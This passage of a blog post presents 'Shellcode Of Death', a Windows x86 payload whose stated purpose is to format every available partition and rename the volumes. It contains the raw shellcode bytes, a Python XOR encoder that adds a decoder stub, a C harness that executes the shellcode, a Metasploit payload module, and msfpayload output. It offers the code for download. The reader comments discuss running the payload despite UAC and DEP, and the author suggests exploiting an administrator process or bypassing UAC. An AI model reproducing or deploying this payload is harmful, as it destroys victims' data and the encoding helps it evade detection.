"\x08\xff\xd3\xff\x74\x24\x04\x8b\x5d\x0c\xff"
"\xd3\x8d\x86\x26\x00\x00\x00\x50\x68\x00\x10"
"\x00\x00\x6a\x01\x8d\x86\x1a\x00\x00\x00\x50"
"\x8d\x86\x10\x00\x00\x00\x50\x6a\x0c\x8d\x46"
"\x08\x50\x8b\x5d\x00\xff\xd3\x68\xc8\x00\x00"
"\x00\x8b\x5d\x04\xff\xd3\x89\xf9\x83\x46\x08"
"\x01\xe2\x8d\x6a\x00\x8b\x5d\x10\xff\xd3\xe8"
"\x7d\xff\xff\xff\x5c\x00\x5c\x00\x2e\x00\x5c"
"\x00\x43\x00\x3a\x00\x5c\x00\x00\x00\x4e\x00"
"\x54\x00\x46\x00\x53\x00\x00\x00\x50\x00\x77"
"\x00\x4e\x00\x65\x00\x44\x00\x00\x00\x55\x89"
"\xe5\x31\xc0\x40\x5d\xc2\x0c\x00")

shellcode = bytearray(c_style_shellcode)

print 'Len of shellcode received: %d' %len(shellcode)

# NULL byte counter
null_count = 0

# Count no. of NULL bytes
for item in shellcode :
        if item == 00 :
            null_count = null_count + 1

print 'Number of NULLs: %d' % null_count

# Add NOPS if shellcode length is not a divisor of 4
if len(shellcode)%4 != 0 :
        shellcode += bytearray("\x90" *(4 - len(shellcode)%4))
        print 'Len of shellcode after NOP addition: %d' %len(shellcode)

xor_shellcode = bytearray('')

# XOR key
# Encode shellcode with this key
# You may customize it as per your need
xor = 0xaa

# XOR encoding begings
for item in shellcode :
        xor_shellcode.append(xor^item)
# XOR encoding ends
       
rev = ''

# Reverse the shellcode
for item in xor_shellcode[::-1] :
        rev += "\\x%02x" %item

final_shellcode = ''

# Adding Decoder Stub
for item in map(''.join, zip(*[iter(rev)]*16)) :
        final_shellcode += "\\x68" + item[-4::] + item[-8:-4:] + item[-12:-8:] + item[-16:-12:]

final_shellcode += "\\x89\\xe6\\x31\\xc9\\xb1"

final_shellcode += "\\x%02x" % (len(shellcode)/4)

final_shellcode += "\\xbb" + 4* ("\\x%02x" % xor)

final_shellcode += "\\x31\\x1e\\x83\\xc6\\x04\\xe2\\xf9\\xff\\xe4"
# Decoder stub added to final shellcode

print 'Length of the encoded shellcode: %d\n' % (len(final_shellcode)/4)

# Print the final XOR encoded shellcode
print final_shellcode

 

Warning: Please do not copy the code from the web page and compile it. All the codes used while developing this shellcode is available for download, use them for your research.

 

Testing the XOR Encoded Shellcode Of Death

 

Filename: XOREncodeDecode.py
 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
#include <stdio.h>
#include <string.h>

/*
                  _     __             _____                    
  /\  /\__ _  ___| | __/ _\_   _ ___  /__   \___  __ _ _ __ ___  
 / /_/ / _` |/ __| |/ /\ \| | | / __|   / /\/ _ \/ _` | '_ ` _ \
/ __  / (_| | (__|   < _\ \ |_| \__ \  / / |  __/ (_| | | | | | |
\/ /_/ \__,_|\___|_|\_\\__/\__, |___/  \/   \___|\__,_|_| |_| |_|
                           |___/                                

                                http://hacksys.vfreaks.com/
                                  hacksysteam@hotmail.com

Module Name:

    Shellcode Test Encoded

Abstract:
   
    This program is used as a template to test
    C style formatted shellcodes. A decoder is
    already added to the final shellcode output.
   
IDE:
     
    Dev-C++ 4.9.9.2 (Windows XP SP3)
       
Compiler:
         
    gcc 3.4.2

*/


unsigned char shellcode[] =
"\x68\xaa\x3a\x3a\x3a\x68\xea\xf7\x68\xa6\x68"
"\x23\x4f\x9b\x6a\x68\xaa\xaa\xaa\xff\x68\xaa"
"\xcf\xaa\xee\x68\xaa\xdd\xaa\xe4\x68\xaa\xaa"
"\xaa\xfa\x68\xaa\xec\xaa\xf9\x68\xaa\xe4\xaa"
"\xfe\x68\xaa\xf6\xaa\xaa\x68\xaa\xe9\xaa\x90"
"\x68\xaa\x84\xaa\xf6\x68\x55\xf6\xaa\xf6\x68"
"\x42\xd7\x55\x55\x68\xf7\xba\x55\x79\x68\x27"
"\xc0\xaa\x21\x68\xec\xa2\xab\x48\x68\x79\x23"
"\x53\x29\x68\x21\xf7\xae\x55\x68\x62\xaa\xaa"
"\xaa\x68\xaa\x55\x79\xc2\x68\xa2\xfa\x21\xf7"
"\x68\xc0\xa6\x27\xec\x68\xaa\xaa\xaa\xfa\x68"
"\xfa\x27\x2c\xba\x68\xb0\xaa\xaa\xaa\x68\xc0"
"\xab\x27\x2c\x68\xaa\xba\xaa\xaa\x68\xaa\xaa"
"\xfa\xc2\x68\x27\x2c\x8c\xaa\x68\xf7\xa6\x55"
"\x79\x68\xde\x8e\xae\x21\x68\xa2\x55\x79\x55"
"\x68\xaa\xfa\x21\xf7\x68\xc2\x8a\xaa\xa3\x68"
"\xf8\xf8\xf8\xf8\x68\xf6\x8e\xae\xf9\x68\x9b"
"\x78\xf8\x27\x68\xfa\x29\x46\xae\x68\xf7\xbe"
"\x55\x79\x68\xaa\x6a\xfc\x21\x68\xa9\xc2\xaa"
"\xaa\x68\xc0\xa9\xf8\xc0\x68\x9b\x78\xf8\xf8"
"\x68\xbd\xf3\x23\x65\x68\x41\xd4\xf4\xc0\x68"
"\xce\xc6\xc6\xaa\x68\xc3\xcc\xd9\x84\x68\x55"
"\x55\xcc\xc7\x68\xa5\x42\x75\x55\x68\x4a\x23"
"\x4f\x41\x68\xf3\xfa\xed\x48\x68\xc1\x55\x55"
"\x55\x68\xe6\x17\xaa\x42\x68\x68\xf3\xfb\x21"
"\x68\xb6\x55\x7a\x23\x68\xb6\x21\xee\x8e\x68"
"\xdf\xa6\xfb\x41\x68\x55\x29\x53\xab\x68\xc0"
"\xad\xf3\x9b\x68\xb0\x99\x23\x4f\x68\x65\xc2"
"\x76\x77\x68\xc2\xac\x4f\x1a\x68\x2d\x25\xec"
"\x46\x68\x3a\xc8\x7d\xc2\x68\x9e\x91\xc2\x3c"
"\x68\xaf\xc2\x0d\x7e\x68\xc2\xba\x0b\xcd\x68"
"\xce\xf1\xa8\x01\x68\xb2\xdf\x59\xc2\x68\x21"
"\xaa\x90\xe5\x68\xa2\x21\xd2\x8a\x68\xea\xb6"
"\x21\xfa\x68\x21\xea\xa6\x21\x68\x9a\xaa\xaa"
"\xaa\x68\x9b\x63\xce\x0b\x68\x27\xae\xa8\x69"
"\x68\xb0\x21\xae\x29\x68\xf1\xb6\x27\xb6\x68"
"\x55\xaa\xaa\x21\x68\xae\xeb\x8f\x55\x68\xa6"
"\xa0\xcc\x21\x68\x21\xe1\x8e\x27\x68\x55\x55"
"\x55\xf1\x68\xb6\xa8\x42\x69\x68\x21\xea\x8a"
"\x27\x68\x27\xae\xa8\xfa\x68\x21\xee\xa8\xd2"
"\x68\x7a\x21\xea\x96\x68\x41\x74\x69\x23\x68"
"\xf1\xde\xa9\xea\x68\xaf\x93\x61\xf2\x68\xdf"
"\x59\x6b\x61\x68\x69\x29\x52\xaa\x68\x6b\x69"
"\xaf\xab\x68\x71\x9b\x6a\x06\x68\x7c\xf9\xfa"
"\x9b\x68\x21\x9e\x29\xab\x68\x41\xf0\x9b\x6a"
"\x89\xe6\x31\xc9\xb1\x63\xbb\xaa\xaa\xaa\xaa"
"\x31\x1e\x83\xc6\x04\xe2\xf9\xff\xe4";


main()
{

    int i, badchar_c = 0;
   
    printf("\n\nShellcode Length: %d\n", sizeof(shellcode)-1);
   
    for(i = 0; i < sizeof(shellcode)-1; ++i) {
          if(((unsigned char *)shellcode)[i] == 0x00) {
                        badchar_c = badchar_c + 1;
          }
    }
    printf("\nNumber of badchar: %d\n\n", badchar_c);
   
    printf("\nPress any key to execute shellcode....\n\n");

    getch();

    int (*ret)() = (int(*)())shellcode;

    ret();

}

 

Warning: Please do not copy the code from the web page and compile it. All the codes used while developing this shellcode is available for download, use them for your research.

Perfect, this is called magic of assembly and python.

I did like to mention that, Vivek Ramachandran sir is giving an online Security Training on assembly, python and many others.

Link: http://securitytube-training.com/
 

Integrating Shellcode Of Death into Metasploit Framework

 

Now, it’s time to write a Payload module for Metasploit. Due to my busy schedule I was not able to complete this module on time decided. But, not to worry, we have it ready to be served.

We have tested this module on Back Track 5 R3 default Metasploit installation. I guess it did not even update it when I tested this module.

Filename: shellcode_of_death.rb
 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
###
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
###
###
#                    uuuuuuu
#                uu$$$$$$$$$$$uu
#             uu$$$$$$$$$$$$$$$$$uu
#            u$$$$$$$$$$$$$$$$$$$$$u
#           u$$$$$$$$$$$$$$$$$$$$$$$u
#          u$$$$$$$$$$$$$$$$$$$$$$$$$u
#          u$$$$$$$$$$$$$$$$$$$$$$$$$u
#          u$$$$$$"   "$$$"   "$$$$$$u
#          "$$$$"      u$u       $$$$"
#           $$$u       u$u       u$$$
#           $$$u      u$$$u      u$$$
#            "$$$$uu$$$   $$$uu$$$$"
#             "$$$$$$$"   "$$$$$$$"
#               u$$$$$$$u$$$$$$$u
#                u$"$"$"$"$"$"$u
#     uuu        $$u$ $ $ $ $u$$       uuu
#    u$$$$        $$$$$u$u$u$$$       u$$$$
#     $$$$$uu      "$$$$$$$$$"     uu$$$$$$
#   u$$$$$$$$$$$uu    """""    uuuu$$$$$$$$$$
#   $$$$"""$$$$$$$$$$uuu   uu$$$$$$$$$"""$$$"
#    """      ""$$$$$$$$$$$uu ""$"""
#              uuuu ""$$$$$$$$$$uuu
#     u$$$uuu$$$$$$$$$uu ""$$$$$$$$$$$uuu$$$
#     $$$$$$$$$$""""           ""$$$$$$$$$$$"
#      "$$$$$"    Shellcode Of      ""$$$$""
#        $$$"        Death            $$$$"
#
#
#                     _     __             _____                    
#     /\  /\__ _  ___| | __/ _\_   _ ___  /__   \___  __ _ _ __ ___  
#    / /_/ / _` |/ __| |/ /\ \| | | / __|   / /\/ _ \/ _` | '_ ` _ \
#   / __  / (_| | (__|   < _\ \ |_| \__ \  / / |  __/ (_| | | | | | |
#   \/ /_/ \__,_|\___|_|\_\\__/\__, |___/  \/   \___|\__,_|_| |_| |_|
#                              |___/                                
#
#                                http://hacksys.vfreaks.com/
#                                  hacksysteam@hotmail.com
#
#
#   Shellcode Of Death
#
#   Copyright (c) 2012-2013 HackSys Team - Panthera
#   All rights reserved.
#
###

require 'msf/core'

module Metasploit3

    include Msf::Payload::Windows
    include Msf::Payload::Single

    def initialize(info = {})
        super(update_info(info,
            'Name'          => 'Shellcode Of Death',
            'Description'   => %q{
                Formats all the available Windows partitions.

                Note: After formatting the volume, it renames
                the volume label as set in the shellcode. If
                error occurs, it skips and proceeds to next volume.
            },
            'Author'        => [ 'Ashfaq Ansari <ashfaq_ansari1989@hotmail.com>' ,
                         'Ruei-Min Jiang <@mike820324>'
                       ],
            'License'       => MSF_LICENSE,
            'Version'       => '$Revision$',
            'Platform'      => 'win',
            'Arch'          => ARCH_X86,
            'Privileged'    => true,
            ))

        # EXITFUNC is not supported
        deregister_options('EXITFUNC')

        # Register command execution options
        register_options(
            [
                OptString.new('VOLUMELABEL', [ false, "Set the volume label", "PwNeD - HackSys Team" ])
            ], self.class)
    end

    def generate

        volume_label        = datastore['VOLUMELABEL'] || ""
        encoded_volume_label    = ''
        temp_voulme_label   = volume_label
       
        temp_voulme_label.split("").each do |i|
            encoded_volume_label    << "#{i}" + "\x00"
        end

        magic_key       = 28 + (2*volume_label.length)

        payload_data =  "\xeb\x5a\x31\xc0\x8b\x34\x83\x01\xd6\x53\x50\x31\xdb\x31\xc0\xac\xc1\xc3\x05\x01\xc3\x83" +
                "\xf8\x00\x75\xf3\xc1\xcb\x05\x39\xcb\x58\x5b\x74\x03\x40\xeb\xde\xc3\x89\xd0\x8b\x40\x3c" +
                "\x8b\x44\x02\x78\x8d\x04\x02\x50\x8b\x40\x20\x8d\x1c\x02\xe8\xc3\xff\xff\xff\x5b\x8b\x4b" +
                "\x24\x8d\x0c\x0a\x66\x8b\x04\x41\x25\xff\xff\x00\x00\x8b\x5b\x1c\x8d\x1c\x1a\x8b\x04\x83" +
                "\x8d\x04\x02\xc3\x31\xc9\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c\x8b\x40\x1c\x8b\x50\x08\x8b" +
                "\x78\x20\x8b\x00\x3a\x4f\x18\x75\xf3\x68\x64\x5b\x02\xab\x68\x10\xa1\x67\x05\x68\xa7\xd4" +
                "\x34\x3b\x68\x96\x90\x62\xd7\x68\x87\x8f\x46\xec\x68\x06\xe5\xb0\xcf\x68\xdc\xdd\x1a\x33" +
                "\x89\xe5\x6a\x07\x59\x31\xff\x83\xf9\x01\x75\x0c\x51\xeb\x1c\x8b\x44\x24\x1c\xff\xd0\x89" +
                "\xc2\x59\x51\x8b\x4c\xbd\x00\xe8\x6b\xff\xff\xff\x59\x50\x47\xe2\xe0\x89\xe5\xeb\x0f\xe8" +
                "\xdf\xff\xff\xff\x66\x6d\x69\x66\x73\x2e\x64\x6c\x6c\x00\xeb\x7e\x5e\x6a\x17\x59\x89\xcf" +
                "\x31\xd2\x52\x52\x6a\x03\x52\x6a\x03\x68\x00\x00\x00\xc0\x56\x8b\x5d\x14\xff\xd3\x50\x83" +
                "\xec\x04\x31\xd2\x52\x8d\x5c\x24\x04\x53\x52\x52\x52\x52\x68\x20\x00\x09\x00\x50\x8b\x5d" +
                "\x08\xff\xd3\xff\x74\x24\x04\x8b\x5d\x0c\xff\xd3\x8d\x86" +
                # You might need to adjust this. Logic: 28 + 2*len(volume_label)
                magic_key.chr +                
                "\x00\x00\x00\x50\x68\x00\x10\x00\x00\x6a\x01\x8d\x86\x1a\x00\x00\x00\x50\x8d\x86\x10\x00" +
                "\x00\x00\x50\x6a\x0c\x8d\x46\x08\x50\x8b\x5d\x00\xff\xd3\x68\xc8\x00\x00\x00\x8b\x5d\x04" +
                "\xff\xd3\x89\xf9\x83\x46\x08\x01\xe2\x8d\x6a\x00\x8b\x5d\x10\xff\xd3\xe8\x7d\xff\xff\xff" +
                "\x5c\x00\x5c\x00\x2e\x00\x5c\x00\x43\x00\x3a\x00\x5c\x00\x00\x00\x4e\x00\x54\x00\x46\x00" +
                "\x53\x00\x00\x00" +
                # Volume Label
                # Default: PwNeD - HackSys Team
                encoded_volume_label +
                # Volume Label End
                "\x00\x00\x55\x89\xe5\x31\xc0\x40\x5d\xc2\x0c\x00"

        the_payload = payload_data
    end

end

 

Warning: Please do not copy the code from the web page and compile it. All the codes used while developing this shellcode is available for download, use them for your research.

 

So, what are we waiting for? Let’s boom!!
 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
root@bt:~/Desktop#msfpayload windows/shellcode_of_death VOLUMELABEL="PwNed by HackSys Team" C
/*
 * windows/shellcode_of_death - 425 bytes
 * http://www.metasploit.com
 * VERBOSE=false, VOLUMELABEL=PwNed by HackSys Team
 */
unsigned char buf[] =
"\xeb\x5a\x31\xc0\x8b\x34\x83\x01\xd6\x53\x50\x31\xdb\x31\xc0"
"\xac\xc1\xc3\x05\x01\xc3\x83\xf8\x00\x75\xf3\xc1\xcb\x05\x39"
"\xcb\x58\x5b\x74\x03\x40\xeb\xde\xc3\x89\xd0\x8b\x40\x3c\x8b"
"\x44\x02\x78\x8d\x04\x02\x50\x8b\x40\x20\x8d\x1c\x02\xe8\xc3"
"\xff\xff\xff\x5b\x8b\x4b\x24\x8d\x0c\x0a\x66\x8b\x04\x41\x25"
"\xff\xff\x00\x00\x8b\x5b\x1c\x8d\x1c\x1a\x8b\x04\x83\x8d\x04"
"\x02\xc3\x31\xc9\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c\x8b\x40"
"\x1c\x8b\x50\x08\x8b\x78\x20\x8b\x00\x3a\x4f\x18\x75\xf3\x68"
"\x64\x5b\x02\xab\x68\x10\xa1\x67\x05\x68\xa7\xd4\x34\x3b\x68"
"\x96\x90\x62\xd7\x68\x87\x8f\x46\xec\x68\x06\xe5\xb0\xcf\x68"
"\xdc\xdd\x1a\x33\x89\xe5\x6a\x07\x59\x31\xff\x83\xf9\x01\x75"
"\x0c\x51\xeb\x1c\x8b\x44\x24\x1c\xff\xd0\x89\xc2\x59\x51\x8b"
"\x4c\xbd\x00\xe8\x6b\xff\xff\xff\x59\x50\x47\xe2\xe0\x89\xe5"
"\xeb\x0f\xe8\xdf\xff\xff\xff\x66\x6d\x69\x66\x73\x2e\x64\x6c"
"\x6c\x00\xeb\x7e\x5e\x6a\x17\x59\x89\xcf\x31\xd2\x52\x52\x6a"
"\x03\x52\x6a\x03\x68\x00\x00\x00\xc0\x56\x8b\x5d\x14\xff\xd3"
"\x50\x83\xec\x04\x31\xd2\x52\x8d\x5c\x24\x04\x53\x52\x52\x52"
"\x52\x68\x20\x00\x09\x00\x50\x8b\x5d\x08\xff\xd3\xff\x74\x24"
"\x04\x8b\x5d\x0c\xff\xd3\x8d\x86\x46\x00\x00\x00\x50\x68\x00"
"\x10\x00\x00\x6a\x01\x8d\x86\x1a\x00\x00\x00\x50\x8d\x86\x10"
"\x00\x00\x00\x50\x6a\x0c\x8d\x46\x08\x50\x8b\x5d\x00\xff\xd3"
"\x68\xc8\x00\x00\x00\x8b\x5d\x04\xff\xd3\x89\xf9\x83\x46\x08"
"\x01\xe2\x8d\x6a\x00\x8b\x5d\x10\xff\xd3\xe8\x7d\xff\xff\xff"
"\x5c\x00\x5c\x00\x2e\x00\x5c\x00\x43\x00\x3a\x00\x5c\x00\x00"
"\x00\x4e\x00\x54\x00\x46\x00\x53\x00\x00\x00\x50\x00\x77\x00"
"\x4e\x00\x65\x00\x64\x00\x20\x00\x62\x00\x79\x00\x20\x00\x48"
"\x00\x61\x00\x63\x00\x6b\x00\x53\x00\x79\x00\x73\x00\x20\x00"
"\x54\x00\x65\x00\x61\x00\x6d\x00\x00\x00\x55\x89\xe5\x31\xc0"
"\x40\x5d\xc2\x0c\x00";

 

Encoding Shellcode Of Death
 

Shellcode Of Death Metasploit Encoded Payload
 

Download Shellcode Of Death archive

Shellcode Of Death
Shellcode Of Death
ShellcodeOfDeath.zip
55.4 KiB
959 Downloads
Details...

 

I look forward for suggestions and comments. So, please feel to write to me if you have any suggestions or you want to improve the code. Thanks for your time.

Greets from HackSys Team – Panthera.
 

51,976 total views, 29 views today

The following two tabs change content below.

Ashfaq Ansari

Security Researcher
Ashfaq Ansari is the founder of HackSys Team code named "Panthera". He is a Security Researcher with experience in various aspects of Information Security. He has authored "HackSys Extreme Vulnerable Driver" and "Shellcode of Death". He has also written and published various whitepapers on low level software exploitation. His core interest lies in "Low Level Exploitation", "Reverse Engineering", "Program Analysis" and "Hybrid Fuzzing". He is a fanboy of Artificial Intelligence and Machine Learning. He is the chapter lead for null Pune.

Latest posts by Ashfaq Ansari (see all)

16 Responses to “Shellcode Of Death”

  1. This file is currently offline. 🙁

  2. i have windows7 x86 on virtualbox and it doesn`t work

    • Hi Gr,

      One of the possible reasons I think of is, UAC on Windows 7.

      As formatting a drive needs “Administrator” privileges.

      Try running the shellcode from a privileged process.

      Thank you.

      • well i used shellcode of death cause i can`t bypass uac and if i could i would have used a simple bat file ..thank you anyway

        • Hi Gr,

          I know about this restriction. This is how Windows has implemented security.

          So, in order to run this shellcode efficiently, you need to exploit an admin process or write a assembly stub to bypass UAC and wrap the shellcode.

          Thank you.

  3. Nice blog, just one note, sc loader you presented will fail to execute shellcode on DEP enabled system like Vista, Seven etc so you have to use VirtualAlloc() first no ?

  4. Nice work Ashfaq.. we are able to catch easily with your explanation.. Great

  5. Nice… you did some hard work on it. Keep it up. Between any possibility of formatting the entire system including the drive in which os is installed.

    • Thanks you very much Ajin Abraham. 🙂

    • Well, I regret to say that it will not allow to format the system drive as operating system will not allow to do this. The shellcode that I have published, itself start the counter from C drive and then moves to the next available drives.

      It indeed tries to format C drive but as expected OS does not allow exclusive lock to the system drive so that the API can format it.

      Thanks.

      • But i am thinking like. consider as a metasploit post exploitation module say which instead of running from the disk, is running directly from memory. In that case any possibilities to interfere the os locks? I think it won’t won’t be possible since the locks are applied to memory itself. But is there any way to overcome this lock?

        • Ajin, we can try this by creating a Metasploit module to execute the shellcode from the memory directly. But, I’m sure that, it will fail to format the drive as the Windows Kernel files, other Windows DLL’s and drivers are loaded into the memory at the boot time from the System drive and is unloaded when PC shuts down. Hence, there is no chance to format the System drive when the Operating System is running (as far as I know).

          Thank you.

    • Nice Work Ashfaq.. Was looking for this from long time.

      Great!

Trackbacks/Pingbacks

  1. Shellcode Of Death - null Security Meet | HackSys Team - Computer Security Research, Penetration Testing, Ethical Hacking, Windows Technical Support - […] Team/null/OWASP/Garage4hackers Pune August security meet. Pleasure to talk about Shellcode Of Death. The event was null Pune which held…

Leave a Reply

Your email address will not be published. Required fields are marked *